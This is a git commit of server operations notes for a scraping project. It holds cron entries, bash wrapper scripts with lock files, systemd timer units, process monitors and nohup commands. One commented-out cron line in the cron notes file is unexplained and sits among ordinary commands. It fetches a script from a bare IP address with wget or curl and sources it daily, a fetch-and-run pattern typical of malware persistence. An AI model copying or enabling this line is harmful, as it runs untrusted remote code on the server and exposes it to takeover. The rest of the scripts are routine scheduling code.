Initial commit

爬虫项目的相关命令/test_yt_data_update/logs/update_yt.log (new file, empty)

爬虫项目的相关命令/test_yt_data_update/scripts/cron相关命令.conf (new file)
@@ -0,0 +1,62 @@
crontab -l

crontab -e

*/1 * * * * bash /data/webapps/prod_yt_search_crawler/cron_run_yt_search_crawler.sh

0 10 * * * /data/webapps/test_yt_data_update/scripts/run_update_yt.sh >> /data/webapps/test_yt_data_update/logs/cron_update_yt.log 2>&1

0 10 * * 1 /data/webapps/test_yt_data_update/scripts/run_update_yt_week.sh >> /data/webapps/test_yt_data_update/logs/cron_update_yt_week.log 2>&1

Run every 10 minutes: */10 * * * * bash /data/webapps/yt_data_update/monitor_update_yt_day.sh

Run once a day at 8 PM: 0 20 * * * bash /data/webapps/prod_nano_crawler/cron_run_nano_crawler.sh

Every day at 11:15 AM: 15 11 * * *

7 14 * * * bash /data/webapps/prod_nano_crawler/cron_run_nano_crawler.sh

### @daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)

Restart with tee (the log is written to several files at once; stderr is merged into the pipe so it is captured too):
nohup python async_yt.py 2>&1 | tee -a output.log > output_$(date +%Y%m%d).log &

1. This is my cron entry:
0 10 * * * /data/webapps/test_yt_data_update/scripts/run_update_yt.sh >> /data/webapps/test_yt_data_update/logs/cron_update_yt.log 2>&1

2. The run_update_yt.sh file:
#!/bin/bash
LOCKFILE="/tmp/update_yt.lock"
LOGFILE="/data/webapps/test_yt_data_update/logs/update_yt.log"
cd /data/webapps/test_yt_data_update/
if [ -e "$LOCKFILE" ]; then
    echo "$(date): Task is already running, skipping." >> "$LOGFILE"
    exit 1
fi
touch "$LOCKFILE"
source ~/.bashrc
conda activate py310
pip install -r requirements.txt
python update_yt.py >> "$LOGFILE" 2>&1
rm -f "$LOCKFILE"

3. After running for a day, the following problems showed up:
3.1. The update_yt.log log shows that the job did start the script successfully at 10:00, but it then kept firing every minute and this went on for an hour. I only need it to start once a day at 10:00. Log excerpt:
- Active tasks: 11/12
- Queue sizes: video=0, channel=0
2025-04-11 10:00:06,880 - update_yt.py - INFO - Starting update tasks...
2025-04-11 10:00:09,125 - update_yt.py - INFO - aiohttp session initialized successfully
Fri Apr 11 10:01:01 CST 2025: Task is already running, skipping.
Fri Apr 11 10:02:01 CST 2025: Task is already running, skipping.
Fri Apr 11 10:03:01 CST 2025: Task is already running, skipping.
Fri Apr 11 10:04:01 CST 2025: Task is already running, skipping.
Fri Apr 11 10:05:01 CST 2025: Task is already running, skipping.

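For what it's worth, "starts at 10:00 and then fires every minute until 11:00" is exactly the pattern a wildcard minute field produces, so it is worth re-checking the installed entry with crontab -l. A comparison sketch (the first line is the suspected culprit, not confirmed from the crontab above):

* 10 * * * /data/webapps/test_yt_data_update/scripts/run_update_yt.sh   (every minute during the 10 o'clock hour)
0 10 * * * /data/webapps/test_yt_data_update/scripts/run_update_yt.sh   (once, at 10:00)
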
3.2. The cron job's own log, cron_update_yt.log, is too noisy: there are no timestamps, so you cannot tell which run a line belongs to, and there are no start/end markers. And because the job fires every minute, the same output is repeated 60 times. Log excerpt:
Requirement already satisfied: PyMySQL==1.1.1 in /root/miniconda3/envs/py310/lib/python3.10/site-packages (from -r requirements.txt (line 13)) (1.1.1)
Requirement already satisfied: python-dotenv==1.0.1 in /root/miniconda3/envs/py310/lib/python3.10/site-packages (from -r requirements.txt (line 14)) (1.0.1)
Requirement already satisfied: typing_extensions==4.12.2 in /root/miniconda3/envs/py310/lib/python3.10/site-packages (from -r requirements.txt (line 15)) (4.12.2)
/data/webapps/test_yt_data_update/scripts/run_update_yt.sh: line 15: 30412 Killed python update_yt.py >> "$LOGFILE" 2>&1

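For reference, the duplicate-run guard can also live in the crontab line itself via flock, whose lock is released automatically even when the job is killed, so there is no stale lock file to clean up. A minimal sketch, using a new lock path (/tmp/cron_update_yt.flock is an assumed name) so it does not collide with the script's own LOCKFILE check:

0 10 * * * /usr/bin/flock -n /tmp/cron_update_yt.flock /data/webapps/test_yt_data_update/scripts/run_update_yt.sh >> /data/webapps/test_yt_data_update/logs/cron_update_yt.log 2>&1
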
爬虫项目的相关命令/test_yt_data_update/scripts/run_update_week_yt.sh (new file)
@@ -0,0 +1,35 @@
#!/bin/bash
LOCKFILE="/tmp/update_yt_week.lock"
LOGFILE="/data/webapps/yt_data_update/logs/update_yt_week.log"
CRONLOG="/data/webapps/yt_data_update/logs/cron_update_yt_week.log"

{
    echo "[$(date '+%F %T')] ==== Cron job started ===="

    cd /data/webapps/yt_data_update/ || {
        echo "[$(date '+%F %T')] Failed to enter the target directory"
        exit 1
    }

    if [ -e "$LOCKFILE" ]; then
        echo "[$(date '+%F %T')] Task is already running, skipping."
        exit 1
    fi

    touch "$LOCKFILE"

    source ~/.bashrc
    conda activate py310

    echo "[$(date '+%F %T')] Installing dependencies..."
    pip install -r requirements.txt

    echo "[$(date '+%F %T')] Running the weekly update script update_yt_week.py..."
    python update_yt_week.py >> "$LOGFILE" 2>&1

    echo "[$(date '+%F %T')] Task finished."
    rm -f "$LOCKFILE"
    echo "[$(date '+%F %T')] ==== Cron job ended ===="
} >> "$CRONLOG" 2>&1

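If the wrapper itself is ever killed between touch and rm -f (or the machine reboots mid-run), the lock file survives and every later run is skipped until someone deletes it by hand. A trap would release it on any exit path; a minimal sketch of the two lines around the lock:

touch "$LOCKFILE"
trap 'rm -f "$LOCKFILE"' EXIT   # runs on normal exit, on errors, and on most signals
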
爬虫项目的相关命令/test_yt_data_update/scripts/run_update_yt.sh (new file)
@@ -0,0 +1,48 @@
#!/bin/bash
LOCKFILE="/tmp/update_yt.lock"
LOGFILE="/data/webapps/test_yt_data_update/logs/update_yt.log"
CRONLOG="/data/webapps/test_yt_data_update/logs/cron_update_yt.log"

{
    echo "[$(date '+%F %T')] ==== Cron job started ===="

    cd /data/webapps/test_yt_data_update/ || {
        echo "[$(date '+%F %T')] Failed to enter the target directory"
        exit 1
    }

    if [ -e "$LOCKFILE" ]; then
        echo "[$(date '+%F %T')] Task is already running, skipping."
        exit 1
    fi

    touch "$LOCKFILE"

    source ~/.bashrc
    conda activate py310

    echo "[$(date '+%F %T')] Installing dependencies..."
    pip install -r requirements.txt

    echo "[$(date '+%F %T')] Running the daily update script update_yt.py..."
    python update_yt.py >> "$LOGFILE" 2>&1

    echo "[$(date '+%F %T')] Task finished."
    rm -f "$LOCKFILE"
    echo "[$(date '+%F %T')] ==== Cron job ended ===="
} >> "$CRONLOG" 2>&1

@@ -0,0 +1,52 @@
#!/bin/bash

# ========== Paths ==========
LOCKFILE="/tmp/main_py.lock"
PROJECT_DIR="/data/webapps/prod_nano_crawler"
LOGFILE="$PROJECT_DIR/logs/nano_crawler.log"
CRONLOG="$PROJECT_DIR/logs/cron_nano_crawler.log"

# ========== Record the cron run log ==========
{
    echo "[$(date '+%F %T')] ==== Scheduled task started ===="

    # ========== Change directory ==========
    cd "$PROJECT_DIR" || {
        echo "[$(date '+%F %T')] ❌ Cannot enter project directory: $PROJECT_DIR"
        exit 1
    }

    # ========== Check whether a run is already in progress ==========
    if [ -e "$LOCKFILE" ]; then
        echo "[$(date '+%F %T')] ⚠️ A run is already in progress, skipping this one"
        exit 1
    fi

    # ========== Create the lock file ==========
    touch "$LOCKFILE"

    # ========== Load the shell environment and activate the conda env ==========
    source ~/.bashrc
    conda activate py310

    # ========== Install dependencies ==========
    echo "[$(date '+%F %T')] 📦 Installing dependencies..."
    pip install -r requirements.txt

    # ========== Run the Python script ==========
    echo "[$(date '+%F %T')] 🚀 Running main.py ..."
    python main.py > "$LOGFILE" 2>&1
    status=$?

    # ========== Check the exit status ==========
    if [ $status -ne 0 ]; then
        echo "[$(date '+%F %T')] ❗ Script failed, exit code: $status"
    else
        echo "[$(date '+%F %T')] ✅ Script finished successfully"
    fi

    # ========== Remove the lock file ==========
    rm -f "$LOCKFILE"

    echo "[$(date '+%F %T')] ==== Scheduled task ended ===="
} > "$CRONLOG" 2>&1

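Note that this wrapper truncates its logs on every run (} > "$CRONLOG" and > "$LOGFILE"), while the other wrappers in this commit append with >>. If run history should be kept, the append form is the one-character difference:

} >> "$CRONLOG" 2>&1
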
@@ -0,0 +1,52 @@
#!/bin/bash

# ========== Paths ==========
LOCKFILE="/tmp/async_yt_py.lock"
PROJECT_DIR="/data/webapps/prod_yt_search_crawler"
LOGFILE="$PROJECT_DIR/output.log"
CRONLOG="$PROJECT_DIR/cron_output.log"

# ========== Record the cron run log ==========
{
    echo "[$(date '+%F %T')] ==== Scheduled task started ===="

    # ========== Change directory ==========
    cd "$PROJECT_DIR" || {
        echo "[$(date '+%F %T')] ❌ Cannot enter project directory: $PROJECT_DIR"
        exit 1
    }

    # ========== Check whether a run is already in progress ==========
    if [ -e "$LOCKFILE" ]; then
        echo "[$(date '+%F %T')] ⚠️ A run is already in progress, skipping this one"
        exit 1
    fi

    # ========== Create the lock file ==========
    touch "$LOCKFILE"

    # ========== Load the shell environment and activate the conda env ==========
    source ~/.bashrc
    conda activate py310

    # ========== Install dependencies ==========
    echo "[$(date '+%F %T')] 📦 Installing dependencies..."
    pip install -r requirements.txt

    # ========== Run the Python script ==========
    echo "[$(date '+%F %T')] 🚀 Running async_yt.py ..."
    python async_yt.py > "$LOGFILE" 2>&1
    status=$?

    # ========== Check the exit status ==========
    if [ $status -ne 0 ]; then
        echo "[$(date '+%F %T')] ❗ Script failed, exit code: $status"
    else
        echo "[$(date '+%F %T')] ✅ Script finished successfully"
    fi

    # ========== Remove the lock file ==========
    rm -f "$LOCKFILE"

    echo "[$(date '+%F %T')] ==== Scheduled task ended ===="
} >> "$CRONLOG" 2>&1

@@ -0,0 +1,52 @@
#!/bin/bash

# ========== Paths ==========
LOCKFILE="/tmp/update_yt.lock"
PROJECT_DIR="/data/webapps/test_yt_data_update"
LOGFILE="$PROJECT_DIR/logs/update_yt.log"
CRONLOG="$PROJECT_DIR/logs/cron_update_yt.log"

# ========== Record the cron run log ==========
{
    echo "[$(date '+%F %T')] ==== Scheduled task started ===="

    # ========== Change directory ==========
    cd "$PROJECT_DIR" || {
        echo "[$(date '+%F %T')] ❌ Cannot enter project directory: $PROJECT_DIR"
        exit 1
    }

    # ========== Check whether a run is already in progress ==========
    if [ -e "$LOCKFILE" ]; then
        echo "[$(date '+%F %T')] ⚠️ A run is already in progress, skipping this one"
        exit 1
    fi

    # ========== Create the lock file ==========
    touch "$LOCKFILE"

    # ========== Load the shell environment and activate the conda env ==========
    source ~/.bashrc
    conda activate py310

    # ========== Install dependencies ==========
    echo "[$(date '+%F %T')] 📦 Installing dependencies..."
    pip install -r requirements.txt

    # ========== Run the Python script ==========
    echo "[$(date '+%F %T')] 🚀 Running update_yt.py ..."
    python update_yt.py >> "$LOGFILE" 2>&1
    status=$?

    # ========== Check the exit status ==========
    if [ $status -ne 0 ]; then
        echo "[$(date '+%F %T')] ❗ Script failed, exit code: $status"
    else
        echo "[$(date '+%F %T')] ✅ Script finished successfully"
    fi

    # ========== Remove the lock file ==========
    rm -f "$LOCKFILE"

    echo "[$(date '+%F %T')] ==== Scheduled task ended ===="
} >> "$CRONLOG" 2>&1

爬虫项目的相关命令/test_yt_data_update/systemd/yt_update.service (new file)
@@ -0,0 +1,19 @@
[Unit]
Description=Daily update_yt.py script
After=network.target

[Service]
Type=oneshot
WorkingDirectory=/data/webapps/test_yt_data_update
ExecStart=/bin/bash -c ' \
    . ~/.bashrc && \
    conda activate py310 && \
    /usr/bin/flock -n /tmp/update_yt.lock \
    python update_yt.py >> logs/update_yt.log 2>&1 \
'
StandardOutput=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt.log
StandardError=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt.log

[Install]
WantedBy=multi-user.target

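Sourcing ~/.bashrc from a non-interactive shell often returns before the conda init block runs, so the activate step can silently do nothing under systemd. An alternative sketch is to call the environment's interpreter directly (the /root/miniconda3/envs/py310 path is assumed from the pip output quoted in 3.2); stdout/stderr already reach the log via StandardOutput/StandardError, so no >> redirect is needed:

ExecStart=/usr/bin/flock -n /tmp/update_yt.lock /root/miniconda3/envs/py310/bin/python update_yt.py
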
爬虫项目的相关命令/test_yt_data_update/systemd/yt_update.timer (new file)
@@ -0,0 +1,11 @@
[Unit]
Description=Run the update_yt.py daily script at 10:00

[Timer]
OnCalendar=*-*-* 10:00:00
OnUnitInactiveSec=2h
Persistent=true
Unit=yt_update.service

[Install]
WantedBy=timers.target

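Two quick checks on the timers: OnUnitInactiveSec=2h re-arms the timer two hours after each run finishes, on top of the 10:00 OnCalendar trigger, so for a strict once-a-day run that line likely needs to be dropped; and the calendar expressions can be verified with systemd-analyze:

systemd-analyze calendar '*-*-* 10:00:00'
systemd-analyze calendar 'Mon *-*-* 10:00:00'
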
爬虫项目的相关命令/test_yt_data_update/systemd/yt_update_week.service (new file)
@@ -0,0 +1,15 @@
[Unit]
Description=Weekly update_yt_week.py script
After=network.target

[Service]
Type=oneshot
WorkingDirectory=/data/webapps/test_yt_data_update
ExecStart=/bin/bash -c ' \
    . ~/.bashrc && \
    conda activate py310 && \
    /usr/bin/flock -n /tmp/update_yt_week.lock \
    python update_yt_week.py >> logs/update_yt_week.log 2>&1 \
'
StandardOutput=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt_week.log
StandardError=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt_week.log

爬虫项目的相关命令/test_yt_data_update/systemd/yt_update_week.timer (new file)
@@ -0,0 +1,11 @@
[Unit]
Description=Run the update_yt_week.py weekly script at 10:00 every Monday

[Timer]
OnCalendar=Mon *-*-* 10:00:00
OnUnitInactiveSec=2h
Persistent=true
Unit=yt_update_week.service

[Install]
WantedBy=timers.target

爬虫项目的相关命令/test_yt_data_update/systemd/相关管理命令.conf (new file)
@@ -0,0 +1,70 @@
# Check timer status
systemctl list-timers | grep yt_update

# Show a timer's detailed schedule
systemctl status yt_update.timer

# Check whether the corresponding service was actually invoked
journalctl -u yt_update.service


# List all active timers
systemctl list-timers
# Status of a specific timer
systemctl status yt_update.timer
# Trigger the job manually
systemctl start yt_update.service
# Follow the job log (systemd level)
tail -f logs/systemd_update_yt.log
# Follow the script's own output log
tail -f logs/update_yt.log
# Disable the job
systemctl disable --now yt_update.timer


#--------------------------------------------------------------------------
# Deployment & start-up commands
# Copy the 4 unit files into /etc/systemd/system/
sudo cp yt_update* /etc/systemd/system/
sudo cp yt_update_week* /etc/systemd/system/

# Reload the systemd configuration
sudo systemctl daemon-reload

# Enable the timers and start them now
sudo systemctl enable --now yt_update.timer
sudo systemctl enable --now yt_update_week.timer


#--------------------------------------------------------------------------

# Make the systemd services and timers take effect
# Reload the systemd configuration so the new services and timers are picked up:
sudo systemctl daemon-reload

# Start and enable the timers:
sudo systemctl enable yt_update.timer
sudo systemctl start yt_update.timer

sudo systemctl enable yt_update_week.timer
sudo systemctl start yt_update_week.timer

# Check the timers
# Check yt_update.timer and yt_update_week.timer and make sure they are running:
sudo systemctl status yt_update.timer
sudo systemctl status yt_update_week.timer

# Where the logs go
# The update_yt.py script logs to /data/webapps/test_yt_data_update/logs/update_yt.log.
# The update_yt_week.py script logs to /data/webapps/test_yt_data_update/logs/update_yt_week.log.
# The scheduled jobs themselves (including the yt_update.service and yt_update_week.service start-up messages) are recorded in /data/webapps/test_yt_data_update/logs/service_log.txt.

# You can inspect the systemd service logs with journalctl, or read the script logs with cat or similar.
journalctl -u yt_update.service
journalctl -u yt_update_week.service

爬虫项目的相关命令/tk_region.conf (new file)
@@ -0,0 +1,83 @@
# /data/sh/start_tk_regio.sh

# crontab -e
# 0 9 * * * /data/sh/start_tk_regio.sh

#!/bin/bash

# Variables
APP_DIR="/data/webapps/test_tk_region"
LOG_FILE="$APP_DIR/sh.log"
PYTHON_SCRIPT="tk_region.py"
MAX_ATTEMPTS=10
WAIT_TIME=600  # 10 minutes, in seconds

# Logging helper
log() {
    echo "[$(date +'%Y-%m-%d %H:%M:%S')] $1" >> "$LOG_FILE"
}

# Change to the application directory
log "==========="
log "Changing to the application directory: $APP_DIR"
cd "$APP_DIR" || {
    log "Cannot change to the application directory $APP_DIR, exiting"
    exit 1
}

# Check whether an old process is still running
attempt=1
while [ $attempt -le $MAX_ATTEMPTS ]; do
    # Look for a running instance of the Python script
    log "Check #$attempt for a running old process..."
    pid=$(ps aux | grep "$PYTHON_SCRIPT" | grep -v grep | awk '{print $2}')

    if [ -z "$pid" ]; then
        log "No running $PYTHON_SCRIPT process found, starting a new one"
        break
    else
        log "Found a running process, PID: $pid"
        if [ $attempt -eq $MAX_ATTEMPTS ]; then
            log "Reached the maximum number of checks ($MAX_ATTEMPTS) with the process still running, giving up"
            exit 1
        fi
        log "Waiting $((WAIT_TIME/60)) minutes before checking again..."
        sleep $WAIT_TIME
        attempt=$((attempt + 1))
    fi
done

# Load the shell environment
log "Loading the conda setup"
source ~/.bashrc || {
    log "Failed to source ~/.bashrc"
    exit 1
}

# Activate the conda environment
log "Activating the conda environment py310"
conda activate py310 || {
    log "Failed to activate the conda environment"
    exit 1
}

log "Activating the virtual environment"
source venv/bin/activate || {
    log "Failed to activate the virtual environment"
    exit 1
}

# Install dependencies
log "Installing dependencies"
pip install -r requirements.txt || {
    log "Failed to install dependencies"
    exit 1
}

# Start the Python script
log "Starting the $PYTHON_SCRIPT script"
nohup python "$PYTHON_SCRIPT" > output.log 2>&1 &
pid=$!
log "$PYTHON_SCRIPT started, PID: $pid"

log "Wrapper finished"

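The ps aux | grep ... | grep -v grep pipeline also matches any process whose command line merely mentions tk_region.py. The monitor scripts later in this commit use pgrep -f for the same check, which would shorten the loop body to something like this (a sketch; the same substring-matching caveat applies):

pid=$(pgrep -f "python $PYTHON_SCRIPT" | head -n 1)
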
爬虫项目的相关命令/yt_data_update自动检测日更周更脚本/monitor_update_yt_day.sh (new file)
@@ -0,0 +1,73 @@
#!/bin/bash

# Configuration
PROJECT_DIR="/data/webapps/yt_data_update"
SCRIPT_NAME="update_yt.py"
START_SCRIPT="$PROJECT_DIR/run_update_yt_day.sh"
LOG_DIR="$PROJECT_DIR/logs"
TODAY=$(date +%F)
LOG_FILE="$LOG_DIR/monitor/monitor_day_$TODAY.log"
MAX_RETRY=3
SLEEP_BETWEEN_CHECK=10

# Make sure the log directory exists (including the monitor/ subdirectory used below)
mkdir -p "$LOG_DIR/monitor"

# Counter file
COUNT_FILE="$LOG_DIR/monitor/monitor_day_count_$TODAY.txt"
[ ! -f "$COUNT_FILE" ] && echo 0 > "$COUNT_FILE"
COUNT=$(cat "$COUNT_FILE")
COUNT=$((COUNT + 1))
echo $COUNT > "$COUNT_FILE"

log() {
    echo "$(date '+%F %T') [check #$COUNT] $1" >> "$LOG_FILE"
}

# Check whether the script is running: exit status 0 if a matching process is found, 1 otherwise
is_running() {
    pgrep -f "python $SCRIPT_NAME" > /dev/null 2>&1
    return $?
}

# Try to start the script
start_script() {
    log "Trying to start the script..."
    bash "$START_SCRIPT"
    sleep 1
    # Check again
    if is_running; then
        PID=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
        echo "$PID" > "$PROJECT_DIR/update_yt_day.pid"
        log "Started successfully, PID=$PID"
        return 0
    else
        log "Failed to start"
        return 1
    fi
}

# Main flow
if is_running; then
    PID=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
    log "The script is already running, PID=$PID"
    exit 0
fi

log "The script is not running, starting the restart procedure..."

RETRY=0
while [ $RETRY -lt $MAX_RETRY ]; do
    start_script
    sleep $SLEEP_BETWEEN_CHECK
    if is_running; then
        log "Restart attempt $((RETRY+1)) succeeded."
        exit 0
    else
        log "Restart attempt $((RETRY+1)) failed."
    fi
    RETRY=$((RETRY + 1))
done

log "All $MAX_RETRY restart attempts failed, giving up for this round."
exit 1

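A quick way to sanity-check the process pattern the monitor relies on is to run the same match by hand; pgrep -a also prints the matched command line:

pgrep -af "python update_yt.py"
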
爬虫项目的相关命令/yt_data_update自动检测日更周更脚本/monitor_update_yt_week.sh (new file)
@@ -0,0 +1,73 @@
#!/bin/bash

# Configuration
PROJECT_DIR="/data/webapps/yt_data_update"
SCRIPT_NAME="update_yt_week.py"
START_SCRIPT="$PROJECT_DIR/run_update_yt_week.sh"
LOG_DIR="$PROJECT_DIR/logs"
TODAY=$(date +%F)
LOG_FILE="$LOG_DIR/monitor/monitor_$TODAY.log"
MAX_RETRY=3
SLEEP_BETWEEN_CHECK=10

# Make sure the log directory exists (including the monitor/ subdirectory used below)
mkdir -p "$LOG_DIR/monitor"

# Counter file
COUNT_FILE="$LOG_DIR/monitor/monitor_count_$TODAY.txt"
[ ! -f "$COUNT_FILE" ] && echo 0 > "$COUNT_FILE"
COUNT=$(cat "$COUNT_FILE")
COUNT=$((COUNT + 1))
echo $COUNT > "$COUNT_FILE"

log() {
    echo "$(date '+%F %T') [check #$COUNT] $1" >> "$LOG_FILE"
}

# Check whether the script is running: exit status 0 if a matching process is found, 1 otherwise
is_running() {
    pgrep -f "python $SCRIPT_NAME" > /dev/null 2>&1
    return $?
}

# Try to start the script
start_script() {
    log "Trying to start the script..."
    bash "$START_SCRIPT"
    sleep 1
    # Check again
    if is_running; then
        PID=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
        echo "$PID" > "$PROJECT_DIR/update_yt_week.pid"
        log "Started successfully, PID=$PID"
        return 0
    else
        log "Failed to start"
        return 1
    fi
}

# Main flow
if is_running; then
    PID=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
    log "The script is already running, PID=$PID"
    exit 0
fi

log "The script is not running, starting the restart procedure..."

RETRY=0
while [ $RETRY -lt $MAX_RETRY ]; do
    start_script
    sleep $SLEEP_BETWEEN_CHECK
    if is_running; then
        log "Restart attempt $((RETRY+1)) succeeded."
        exit 0
    else
        log "Restart attempt $((RETRY+1)) failed."
    fi
    RETRY=$((RETRY + 1))
done

log "All $MAX_RETRY restart attempts failed, giving up for this round."
exit 1

爬虫项目的相关命令/yt_data_update自动检测日更周更脚本/run_update_yt_day.sh (new file)
@@ -0,0 +1,8 @@
#!/bin/bash
source ~/.bashrc
conda activate py310
cd /data/webapps/yt_data_update/
pip install -r requirements.txt
python update_yt.py >> logs/yt_up_date_day_outup/output_day_$(date +%F).log 2>&1 &

爬虫项目的相关命令/yt_data_update自动检测日更周更脚本/run_update_yt_week.sh (new file)
@@ -0,0 +1,8 @@
#!/bin/bash
source ~/.bashrc
conda activate py310
cd /data/webapps/yt_data_update/
pip install -r requirements.txt
python update_yt_week.py >> logs/yt_up_date_week_outup/output_week_$(date +%F).log 2>&1 &

爬虫项目的相关命令/相关命令.conf (new file)
@@ -0,0 +1,43 @@
nohup /data/webapps/test_check_tiktok_account/venv/bin/python check_account.py > output.log 2>&1

nohup /data/webapps/test_yt_search_crawler/venv/bin/python async_yt.py > output.log 2>&1

nohup python async_yt.py > output.log 2>&1 &


nohup env PYTHONPATH=/data/webapps/test_influencer_search_agent python -m dialogue.influencer_search > /data/webapps/test_influencer_search_agent/log/test_influencer_search_20250324.log 2>&1 &


ps axjf | grep dialogue.influencer_search

ps axjf | grep async_yt.py
ps aux | grep async_yt.py


ps axjf | grep check_account.py
ps axjf | grep async_tk_crawler.py


ps axjf | grep async_yt.py | grep -v grep | awk '{print "kill -9 ",$2}' | sh -


Start the script:
cd /data/webapps/yt_search_crawler
source venv/bin/activate
nohup python async_yt.py > output.log 2>&1 &


Give each process its own name via exec -a:
nohup bash -c "exec -a yt01 python async_yt.py" > output_01.log 2>&1 &
nohup bash -c "exec -a yt02 python async_yt.py" > output_02.log 2>&1 &

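After the exec -a rename, each copy shows up under its own argv[0], so the instances can be inspected or stopped individually; a usage sketch:

ps aux | grep yt01
pgrep -f yt01 | xargs -r kill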